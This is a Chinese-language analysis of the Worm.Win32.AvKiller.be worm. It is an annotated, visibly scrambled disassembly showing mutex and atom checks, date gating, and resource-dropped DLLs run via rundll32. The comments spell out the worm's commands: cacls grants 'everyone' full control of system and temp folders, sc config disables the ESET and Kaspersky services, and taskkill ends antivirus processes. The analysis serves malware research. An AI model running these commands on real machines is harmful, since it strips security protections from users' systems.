
AvKiller病毒分析

Worm.Win32.AvKiller.be是一个蠕虫病毒，利用Upack程序进行保护。病毒会利用CreateMutex创建一个名为system的互斥体，保证系统中只有一个实例在运行；如果这个互斥体已经存在，则病毒直接退出。下面是详细分析，每一步的过程都加了详细的注释。本文内容所提及均为本地测试，旨在提供教育和研究信息，内容已去除关键敏感信息和代码，以防止被恶意利用。作者不鼓励或支持任何形式的非法行为。


////////////////////////////////////////////////////////////////////////////////
//
//------------------------------------------------------------------------------
// Malware original entry point (OEP)
//------------------------------------------------------------------------------
//
0040118C
0040118D
0040118F
55
PUSHEBP
8BEC
MOVEBP,ESP
81EC000B0000SUBESP,0B00
//------------------------------------------------------------------------------
// check infection marker (sny_trojan); if not present, mark this PC first
//------------------------------------------------------------------------------
00401195
00401196
ESI,00403688
0040119B
0040119C
0040119D
[402050]
56
PUSHESI
BE
88364000
MOV
;ASCIIsny_trojan
57
56
PUSHEDI
PUSHESI
FF15
50204000
CALL
;kernel32.GlobalFindAtomA(sny_trojan)
004011A3
004011A6
004011A8
004011AA
004011AB
004011AC
004011B1
[40204C]
004011B7
004011B9
004011BB
004011BD
004011C2
004011C3
004011C4
66:85C0
7713
33FF
TESTAX,AX
JASHORT004011BB
XOREDI,EDI
PUSHESI
56
57
PUSHEDI
6801001F00
PUSH1F0001
FF15
4C204000
CALL
;kernel32.OpenMutexAsny_trojan
TESTEAX,EAX
85C0
7407
33C0
E9B2030000
53
JESHORT004011C2
XOREAX,EAX
JMP00401574
PUSHEBX
56
PUSHESI
FF15
48204000
CALL
[402048]
;kernel32.GlobalAddAtomAsny_trojan
004011CA
004011CB
004011CC
004011CD
[402044]
56
57
57
PUSHESI
PUSHEDI
PUSHEDI
FF15
44204000
CALL
;kernel32.CreateMutexA-sny_trojan
//------------------------------------------------------------------------------
// Get the year; if it is after 2007 now, go to kill AV
//------------------------------------------------------------------------------
004011D3
004011D6
004011D7
[402024]
8D45F0
50
LEAEAX,[EBP-10]
PUSHEAX
FF15
24204000
CALL
PTR
;kernel32.GetSystemTime
004011DD
[EBP-10],7D7
004011E3
66:817D
F0
D707
CMP
WORD
;2007=7D7
8B3D
60204000
MOV
MOV
EDI,[402060]
004011E9
;MSVCRT.sprintf
8B1D
40204000
EBX,[402040]
004011EF
004011F4
;kernel32.WinExec
MOVESI,104
BE04010000
0F8631010000JBE0040132B
//------------------------------------------------------------------------------
// Edit ACLs of the %SystemRoot% directory -- full control
//------------------------------------------------------------------------------
004011FA
00401200
00401201
00401202
[402010]
00401208
0040120E
0040120F
00401215
00403664
0040121A
0040121B
EDI
8D85ECFEFFFF
LEAEAX,[EBP-114]
PUSHESI
56
50
PUSHEAX
FF15
10204000
CALL
PUSH
;kernel32.GetSystemDirectoryA
LEAEAX,[EBP-114]
8D85ECFEFFFF
50
PUSHEAX
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
64364000
;ASCIIcmd/ccacls%s/e/peveryone:f
PUSHEAX
50
FFD7
CALL
;sprintfcmd/ccaclsSystemDirectory/e/p
everyone:f
0040121D
00401220
00401226
00401228
00401229
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
;WinExec(SW_HIDE)cmd/ccacls
SystemDirectory/e/peveryone:f
//------------------------------------------------------------------------------
// Edit ACLs of the %Temp% directory -- full control
//------------------------------------------------------------------------------
0040122B
00401231
00401232
00401233
[40203C]
00401239
0040123F
00401240
00401246
00403640
everyone:f
0040124B
0040124C
EDI
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
;kernel32.GetTempPathA
8D85ECFEFFFF
50
LEAEAX,[EBP-114]
PUSHEAX
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
40364000
PUSH
;ASCIIcmd/ccacls%s/e/p
50
PUSHEAX
FFD7
CALL
;sprintf
0040124E
00401251
00401257
00401259
0040125A
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
;WinExec(SW_HIDE)cmd/c
cacls%TEMP%/e/peveryone:f
0040125C
00401262
00401263
00401264
[40203C]
0040126A
00401270
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
// disable the service (ekrn) of ESET NOD32
// cmd /c sc config ekrn start= disabled
//------------------------------------------------------------------------------
00401271
00401277
00403618
disabled
0040127C
0040127D
EDI
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
18364000
PUSH
;ASCIIcmd/cscconfigekrnstart=
50
PUSHEAX
FFD7
CALL
;sprintf
0040127F
00401282
00401288
0040128A
0040128B
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
CALL
;WinExec
0040128D
00401293
00401294
00401295
[40203C]
0040129B
004012A1
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
// kill the process (ekrn.exe) of ESET NOD32
// cmd /c taskkill /im ekrn.exe /f
//------------------------------------------------------------------------------
004012A2
004012A8
004035F8
004012AD
004012AE
EDI
8D85E8FDFFFFLEAEAX,[EBP-218]
68
F8354000
PUSH
;ASCIIcmd/ctaskkill/imekrn.exe/f
50
PUSHEAX
FFD7
CALL
CALL
CALL
;sprintf
004012B0
004012B3
004012B9
004012BB
004012BC
EBX
83C40C
ADDESP,0C
8D85E8FDFFFFLEAEAX,[EBP-218]
6A00
50
PUSH0
PUSHEAX
FFD3
;WinExec
004012BE
004012C4
004012C5
004012C6
[40203C]
004012CC
004012D2
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
// kill the process (egui.exe) of ESET NOD32
// cmd /c taskkill /im egui.exe /f
//------------------------------------------------------------------------------
004012D3
004012D9
8D85E8FDFFFFLEAEAX,[EBP-218]
68
D8354000
PUSH
004035D8
004012DE
004012DF
004012E1
004012E4
004012EA
004012EC
004012ED
;ASCIIcmd/ctaskkill/imegui.exe/f
50
PUSHEAX
CALLEDI
FFD7
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALLEBX
004012EF
004012F5
004012F6
004012F7
[40203C]
004012FD
00401303
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
50
//------------------------------------------------------------------------------
// kill the process (ScanFrm.exe) of Rising
// cmd /c taskkill /im ScanFrm.exe /f
//------------------------------------------------------------------------------
00401304
0040130A
004035B4
/f
8D85E8FDFFFF
LEAEAX,[EBP-218]
68
B4354000
PUSH
;ASCIIcmd/ctaskkill/imScanFrm.exe
0040130F
00401310
EDI
50
PUSHEAX
FFD7
CALL
;sprintf
00401312
00401315
0040131B
0040131D
0040131E
EBX
83C40C
8D85E8FDFFFF
6A00
ADDESP,0C
LEAEAX,[EBP-218]
PUSH0
50
PUSHEAX
FFD3
CALL
CALL
;WinExec
PUSH1388
FF15
00401320
00401325
[402038]
\system32\killkb.dll
0040132B
00401331
00401332
00401333
[402034]
00401339
0040133F
6888130000
38204000
;kernel32.Sleep//strcat%windows%+
8D85E4FCFFFF
LEAEAX,[EBP-31C]
56
50
PUSHESI
PUSHEAX
FF15
34204000
CALL
PUSH
;kernel32.GetWindowsDirectoryA
LEAEAX,[EBP-31C]
8D85E4FCFFFF
68
9C354000
0040359C
00401344
;ASCII\system32\killkb.dll
PUSHEAX
3A020000
50
00401345
E8
CALL
00401584
;c:\windows\\system32\killkb.dll
MSVCRT.strcat
//------------------------------------------------------------------------------
// check the year; if it is before 2007 now, skip the following
// and go to 0040138D
//------------------------------------------------------------------------------
0040134A
00401350
00401351
00401352
66:817DF0D707CMPWORDPTR[EBP-10],7D7
59
POPECX
59
POPECX
7639
JBESHORT0040138D
//------------------------------------------------------------------------------
// after 2007
// WriteReSourceToFile(BIN, 95, %windows% + \system32\killkb.dll)
// exec rundll32.exe %windows% + \system32\killkb.dll,droqp
//------------------------------------------------------------------------------
00401354
EAX,[EBP-31C]
0040135A
0040135B
00403598
00401360
00401365
00401000
8D85
E4FCFFFF
LEA
;%windows%+\system32\killkb.dll
50
PUSHEAX
68
98354000
PUSH
;ASCIIBIN
6895000000
PUSH95
E8
96FCFFFF
CALL
; WriteReSourceToFile(BIN, 95, %windows% + \system32\killkb.dll)
// rundll32.exe %windows% + \system32\killkb.dll,droqp
0040136A
00401370
00401371
00401377
00403580
0040137C
0040137D
EDI
8D85E4FCFFFF
50
LEAEAX,[EBP-31C]
PUSHEAX
8D8500F5FFFF
LEAEAX,[EBP-B00]
68
80354000
PUSH
CALL
;ASCIIrundll32.exe%s,droqp
PUSHEAX
;sprintf
50
FFD7
0040137F
00401382
00401388
0040138A
0040138B
EBX
83C418
8D8500F5FFFF
6A00
ADDESP,18
LEAEAX,[EBP-B00]
PUSH0
50
PUSHEAX
FFD3
CALL
;WinExec(rundll32.exe%windows%
+\system32\killkb.dll,droqp,SW_HIDE)
//------------------------------------------------------------------------------
// for all (before and after 2007)
//------------------------------------------------------------------------------
0040138D
00401392
[402038]
00401398
0040139E
0040139F
004013A0
[40203C]
6888130000
PUSH1388
FF15
38204000
CALL
CALL
;kernel32.Sleep
8D85ECFEFFFF
LEAEAX,[EBP-114]
PUSHEAX
PUSHESI
50
56
FF15
3C204000
;kernel32.GetTempPathA
//------------------------------------------------------------------------------
// disable the service (avp) of KAV
// cmd /c sc config avp start= disabled
//------------------------------------------------------------------------------
004013A6
004013AC
004013AD
004013B3
00403558
disabled
004013B8
004013B9
EDI
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
8D85E8FDFFFFLEAEAX,[EBP-218]
50
68
58354000
PUSH
;ASCIIcmd/cscconfigavpstart=
50
PUSHEAX
FFD7
CALL
;sprintf
ADDESP,0C
004013BB
004013BE
004013C4
004013C6
004013C7
EBX
83C40C
8D85E8FDFFFFLEAEAX,[EBP-218]
6A00
50
PUSH0
PUSHEAX
FFD3
CALL
;WinExec
//------------------------------------------------------------------------------
// kill the process (avp.exe) of KAV
// cmd /c taskkill /im avp.exe /f
//------------------------------------------------------------------------------
004013C9
004013CF
004013D0
004013D1
[40203C]
004013D7
004013DD
004013DE
004013E4
00403538
8D85ECFEFFFFLEAEAX,[EBP-114]
50
56
PUSHEAX
PUSHESI
FF15
3C204000
CALL
PUSH
;kernel32.GetTempPathA
8D85ECFEFFFFLEAEAX,[EBP-114]
PUSHEAX
8D85E8FDFFFFLEAEAX,[EBP-218]
50
68
38354000
;ASCIIcmd/ctaskkill/imavp.exe/f
004013E9
004013EA
EDI
50
PUSHEAX
FFD7
CALL
;sprintf
004013EC
004013EF
004013F5
004013F7
004013F8
EBX
83C40C
ADDESP,0C
8D85E8FDFFFFLEAEAX,[EBP-218]
6A00
50
PUSH0
PUSHEAX
FFD3
CALL
MOV
;WinExec
8B3D
004013FA
EDI,[402038]
00401400
38204000
;kernel32.Sleep
6888130000
FFD7
PUSH1388
CALLEDI
00401405
//------------------------------------------------------------------------------
// write file c:\WINDOWSupdate.dll from resource
// WriteEncryptedReSourceToFileWithAnti(8F, BIN, c:\WINDOWSupdate.dll)
//------------------------------------------------------------------------------
00401407
0040140D
0040140E
0040140F
[402034]
8D85E4FCFFFF
LEAEAX,[EBP-31C]
PUSHESI
56
50
PUSHEAX
FF15
34204000
CALL
;kernel32.GetWindowsDirectoryA
// strcat %windows% + \system32\update.dll
00401415
0040141B
0040352C
00401420
00401421
00401584
00401426
0040142C
0040142D
0040142E
00401434
00401435
00401436
EBX
8D85E4FCFFFF
LEAEAX,[EBP-31C]
68
2C354000
PUSH
CALL
;ASCIIupdate.dll
50
PUSHEAX
E8
5E010000
;MSVCRT.strcat
8B1D10204000MOVEBX,[402010]
59
POPECX
59
POPECX
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHESI
56
50
PUSHEAX
FFD3
CALL
CALL
;kernel32.GetSystemDirectoryA
00401438
0040143E
0040143F
00401440
EBX
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHESI
56
50
PUSHEAX
FFD3
;kernel32.GetSystemDirectoryA
00401442
00401448
00401449
0040144A
0040144C
[402030]
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHESI
56
50
PUSHEAX
PUSH0
6A00
FF15
30204000
CALL
PUSH
;kernel32.GetModuleFileNameA
LEAEAX,[EBP-31C]
PUSHEAX
00401452
00401458
00401459
00403598
0040145E
00401463
004010AC
8D85E4FCFFFF
50
68
98354000
;ASCIIBIN
688F000000
PUSH8F
E8
44FCFFFF
CALL
; WriteEncryptedReSourceToFileWithAnti(8F, BIN, c:\WINDOWSupdate.dll)
// copy module file name
00401468
0040146A
00401470
00401475
00401476
0040157E
0040147B
00401481
00401482
00401488
00401489
00401578
6A00
PUSH0
8D8504F6FFFF
68DC050000
50
LEAEAX,[EBP-9FC]
PUSH5DC
PUSHEAX
E8
03010000
CALL
CALL
;JMPtoMSVCRT.memset
8D85E0FBFFFF
LEAEAX,[EBP-420]
PUSHEAX
50
8D8504F6FFFF
50
LEAEAX,[EBP-9FC]
PUSHEAX
E8
EA000000
;JMPtoMSVCRT.strcpy
// ModuleFileName + _
0040148E
00401493
00401499
0040149A
0040149B
00401584
BE28354000
MOVESI,00403528
LEAEAX,[EBP-9FC]
PUSHESI
8D8504F6FFFF
56
50
PUSHEAX
E8
E4000000
CALL
;JMPtoMSVCRT.strcat
// ModuleFileName + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
004014A0
0040326C
68
6C324000
PUSH
;ASCII
o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
004014A5
004014AB
004014AC
00401584
8D8504F6FFFF
50
LEAEAX,[EBP-9FC]
PUSHEAX
E8
D3000000
CALL
;JMPtoMSVCRT.strcat
// ModuleFileName + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
// + _
004014B1
004014B7
004014B8
004014B9
00401584
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
E8
C6000000
CALL
;JMPtoMSVCRT.strcat
// ModuleFileName + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
// + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo
004014BE
004014C4
00403210
8D8504F6FFFFLEAEAX,[EBP-9FC]
68
10324000
PUSH
;ASCII
o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo
004014C9
004014CA
00401584
50
PUSHEAX
E8
B5000000
CALL
;JMPtoMSVCRT.strcat
// ModuleFileName + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
// + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo + _
004014CF
004014D2
004014D8
004014D9
004014DA
00401584
83C440
ADDESP,40
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
E8
A5000000
CALL
;JMPtoMSVCRT.strcat
// ModuleFileName + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
// + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo + _ + NULL
004014DF
004014E5
004014EA
004014EB
00401584
8D8504F6FFFFLEAEAX,[EBP-9FC]
6808304000
50
PUSH00403008
PUSHEAX
E8
94000000
CALL
CALL
;JMPtoMSVCRT.strcat
// LoadLibrary(c:\WINDOWSupdate.dll)
004014F0
004014F3
004014F9
004014FA
[40202C]
83C410
ADDESP,10
8D85E4FCFFFF
50
LEAEAX,[EBP-31C]
PUSHEAX
FF15
2C204000
;kernel32.LoadLibraryA
// GetProcAddress(Scan, c:\WINDOWSupdate.dll)
00401500
00401502
00401504
00403000
00401509
0040150A
[402028]
85C0
TESTEAX,EAX
JESHORT00401528
7424
68
00304000
PUSH
CALL
;ASCIIScan
50
PUSHEAX
FF15
28204000
;kernel32.GetProcAddress
// call WINDOWSupdate.dll::Scan(0, 0,
// ModuleFileName + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9MMijYjqLIkVFAo
// + _ + o12aSkSLyZo7kJtsY2pGuSmNFA2WyU2xO9Dd6jYLqDKr3VAo + _ + NULL
// )
00401510
00401512
00401514
0040151A
0040151B
0040151D
0040151F
EAX
85C0
TESTEAX,EAX
JESHORT00401521
LEAECX,[EBP-9FC]
PUSHECX
740D
8D8D04F6FFFF
51
6A00
PUSH0
6A00
PUSH0
FFD0
CALL
CALL
;WINDOWSupdate.dll::Scan
00401521
00401526
EDI
680046C323
PUSH23C34600
FFD7
;Sleep()
00401528
0040152D
00401533
EBX
BE90010000
MOVESI,190
LEAEAX,[EBP-9FC]
PUSHESI
8D8504F6FFFF
56
50
PUSHEAX
FFD3
CALL
CALL
;GetSystemDirectory
00401537
0040153D
0040153E
0040153F
EBX
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
;GetSystemDirectory
// check the year 2008; if it is before 2008 now, go to exit
00401541
00401547
66:817DF0D807CMPWORDPTR[EBP-10],7D8
7628
JBESHORT00401571
//.........
00401549
0040154F
00401550
00401551
EBX
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
CALL
CALL
;GetSystemDirectory
00401553
00401559
0040155A
0040155B
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
EBX
;GetSystemDirectory
LEAEAX,[EBP-9FC]
0040155D
00401563
00401564
00401565
EBX
8D8504F6FFFF
56
50
PUSHESI
PUSHEAX
FFD3
CALL
CALL
;GetSystemDirectory
00401567
0040156D
0040156E
0040156F
EBX
8D8504F6FFFF
LEAEAX,[EBP-9FC]
PUSHESI
56
50
PUSHEAX
FFD3
;GetSystemDirectory
00401571
00401573
00401574
00401575
00401576
00401577
33C0
5B
XOREAX,EAX
POPEBX
POPEDI
POPESI
LEAVE
5F
5E
C9
C3
RET
//------------------------------------------------------------------------------
// WriteReSourceToFile(ResourceName, ResourceType, FilePath)
//------------------------------------------------------------------------------
00401000
00401001
00401003
00401009
0040100A
0040100C
0040100F
00401012
00401013
[402020]
55
PUSHEBP
8BEC
MOVEBP,ESP
81EC10010000SUBESP,110
53
PUSHEBX
33DB
FF750C
FF7508
53
XOREBX,EBX
PUSHDWORDPTR[EBP+C]
PUSHDWORDPTR[EBP+8]
PUSHEBX
FF15
20204000
CALL
; kernel32.FindResourceA(hModule=NULL, ResourceName=95, ResourceType=BIN)
00401019
0040101A
0040101B
0040101E
[40201C]
50
PUSHEAX
PUSHEBX
MOV[EBP+8],EAX
FF15
53
894508
1C204000
CALL
; kernel32.LoadResource(hModule=NULL, hResource=handle)
00401024
00401025
00401028
[402018]
0040102E
0040102F
50
PUSHEAX
MOV[EBP-4],EAX
FF15
8945FC
18204000
CALL
;kernel32.SetHandleCount
53
53
PUSHEBX
PUSHEBX
00401030
00401032
00401033
00401034
00401039
0040103C
0040103F
[402014]
6A02
PUSH2
53
PUSHEBX
53
PUSHEBX
6800000040
FF7510
8945F8
PUSH40000000
PUSHDWORDPTR[EBP+10]
MOV[EBP-8],EAX
FF15
14204000
CALL
; kernel32.CreateFileA(FileName=C:\windows\system32\killkb.dll, Access=GENERIC_WRITE, ShareMode=0, pSecurity=NULL, Mode=CREATE_ALWAYS, Attributes=0, hTemplateFile=NULL)
// check CreateFile failure
00401045
00401048
[EBP+C],EAX
0040104B
0040104D
0040104E
00401054
00401055
0040105A
00401060
00401061
00401062
ESI
83F8FF
CMPEAX,-1
8945
0C
MOV
;FileHandle
7443
56
JESHORT00401090
PUSHESI
8B3510204000MOVESI,[402010]
57
PUSHEDI
BF04010000
MOVEDI,104
8D85F0FEFFFFLEAEAX,[EBP-110]
57
50
PUSHEDI
PUSHEAX
FFD6
CALL
CALL
;kernel32.GetSystemDirectoryA
8D85F0FEFFFFLEAEAX,[EBP-110]
00401064
0040106A
0040106B
0040106C
ESI
57
50
PUSHEDI
PUSHEAX
FFD6
;kernel32.GetSystemDirectoryA
0040106E
00401071
00401072
00401073
00401076
00401077
[40200C]
0040107D
0040107E
00401081
00401084
[402008]
0040108A
0040108B
8D45F4
53
LEAEAX,[EBP-C]
PUSHEBX
50
PUSHEAX
FF7508
53
PUSHDWORDPTR[EBP+8]
PUSHEBX
FF15
0C204000
CALL
CALL
;kernel32.SizeofResource
50
PUSHEAX
FF75F8
FF750C
PUSHDWORDPTR[EBP-8]
PUSHDWORDPTR[EBP+C]
FF15
08204000
;kernel32.WriteFile
5F
5E
POPEDI
POPESI
0040108C
0040108E
00401090
00401092
00401094
00401097
[402004]
85C0
TESTEAX,EAX
7504
JNZSHORT00401094
XOREAX,EAX
33C0
EB15
FF750C
JMPSHORT004010A9
PUSHDWORDPTR[EBP+C]
FF15
04204000
CALL
CALL
;kernel32.CloseHandle
PUSHDWORDPTR[EBP-4]
0040109D
004010A0
[402000]
FF75FC
FF15
00204000
;kernel32.FreeResource
004010A6
004010A8
004010A9
004010AA
004010AB
6A01
58
PUSH1
POPEAX
POPEBX
LEAVE
RET
5B
C9
C3
//------------------------------------------------------------------------------
// WriteEncryptedReSourceToFileWithAnti(ResourceName, ResourceType, FilePath)
//------------------------------------------------------------------------------
004010AC
004010AD
004010AF
004010B5
004010B6
004010B8
004010BB
004010BE
004010BF
[402020]
55
PUSHEBP
8BEC
MOVEBP,ESP
81EC20010000SUBESP,120
53
PUSHEBX
33DB
FF750C
FF7508
53
XOREBX,EBX
PUSHDWORDPTR[EBP+C]
PUSHDWORDPTR[EBP+8]
PUSHEBX
FF15
20204000
CALL
;kernel32.FindResourceA(NULL,8F,BIN)
004010C5
004010C6
004010C7
004010CA
[40201C]
004010D0
004010D1
004010D4
[402018]
50
PUSHEAX
PUSHEBX
53
894508
MOV[EBP+8],EAX
FF15
1C204000
CALL
CALL
;kernel32.LoadResource
50
PUSHEAX
8945F8
MOV[EBP-8],EAX
FF15
18204000
;kernel32.SetHandleCount
004010DA
004010DB
004010DC
004010DE
004010DF
004010E0
53
PUSHEBX
PUSHEBX
PUSH2
53
6A02
53
PUSHEBX
PUSHEBX
53
6800000040
PUSH40000000
004010E5
004010E8
004010EB
[402014]
FF7510
8945FC
PUSHDWORDPTR[EBP+10]
MOV[EBP-4],EAX
FF15
14204000
CALL
; kernel32.CreateFileA(c:\WINDOWSupdate.dll, GENERIC_WRITE, 0, NULL, CREATE_ALWAYS, 0, NULL)
// check failure
004010F1
004010F4
004010F7
004010F9
004010FB
83F8FF
894510
7507
CMPEAX,-1
MOV[EBP+10],EAX
JNZSHORT00401100
XOREAX,EAX
JMP00401189
33C0
E989000000
00401100
00401103
00401104
[402024]
8D45E4
50
LEAEAX,[EBP-1C]
PUSHEAX
FF15
24204000
CALL
;kernel32.GetSystemTime
// check the year 2007
0040110A66:817DE4D707CMPWORDPTR[EBP-1C],7D7
00401110
00401112
00401113
00401119
0040111A
0040111F
00401125
00401126
00401127
0040112A
ESI
7662
JBESHORT00401174
PUSHESI
56
8B3510204000MOVESI,[402010]
57
PUSHEDI
BF04010000
MOVEDI,104
8D85E0FEFFFFLEAEAX,[EBP-120]
57
PUSHEDI
PUSHEAX
MOV[EBP+F],BL
FFD6
50
885D0F
CALL
CALL
;kernel32.GetSystemDirectoryA
0040112C
00401132
00401133
00401134
ESI
8D85E0FEFFFF
LEAEAX,[EBP-120]
PUSHEDI
57
50
PUSHEAX
FFD6
;kernel32.GetSystemDirectoryA
00401136
00401139
0040113F
00401141
00401142
ESI
FF7508
PUSHDWORDPTR[EBP+8]
8B350C204000MOVESI,[40200C]
33FF
53
XOREDI,EDI
PUSHEBX
FFD6
CALL
;kernel32.SizeofResource
TESTEAX,EAX
00401144
85C0
00401146
762A
JBESHORT00401172
//------------------------------------------------------------------------------
// write file loop, 1 byte at a time
//------------------------------------------------------------------------------
00401148
0040114B
// decode: each resource byte is incremented by one (INC AL below) before it is written
0040114C
0040114F
00401151
00401154
00401157
00401158
0040115B
0040115D
0040115E
00401161
[402008]
8B45FC
53
MOVEAX,[EBP-4]
PUSHEBX
8A0407
FEC0
88450F
8D45F4
50
8D450F
6A01
50
MOVAL,[EDI+EAX]
INCAL
MOV[EBP+F],AL
LEAEAX,[EBP-C]
PUSHEAX
LEAEAX,[EBP+F]
PUSH1
PUSHEAX
FF7510
PUSHDWORDPTR[EBP+10]
FF15
08204000
CALL
; kernel32.WriteFile(hFile, pBuffer, nBytesToWrite=1, pBytesWritten, NULL)
00401167
// edi++ (next byte)
FF7508
PUSHDWORDPTR[EBP+8]
0040116A
0040116B
0040116C
ESI
47
53
INCEDI
PUSHEBX
FFD6
CALL
;SizeOfResource
// check the end
0040116E
00401170
//
3BF8
^72D6
CMPEDI,EAX
JBSHORT00401148
00401172
00401173
00401174
00401177
[402004]
00401188
00401189
0040118A
0040118B
00401578
[402064]
0040157E
[402058]
00401584
[40205C]
5F
5E
FF7510
POPEDI
POPESI
PUSHDWORDPTR[EBP+10]
FF15
04204000
CALL
CALL
;kernel32.CloseHandle
PUSHDWORDPTR[EBP-8]
FF75F8
FF15
;kernel32.FreeResource
00204000
6A01
58
5B
C9
C3
PUSH1
POPEAX
POPEBX
LEAVE
RET
-
FF25
;MSVCRT.strcpy
FF25
;MSVCRT.memset
FF25
;MSVCRT.strcat
64204000
JMP
JMP
JMP
-
-
58204000
5C204000
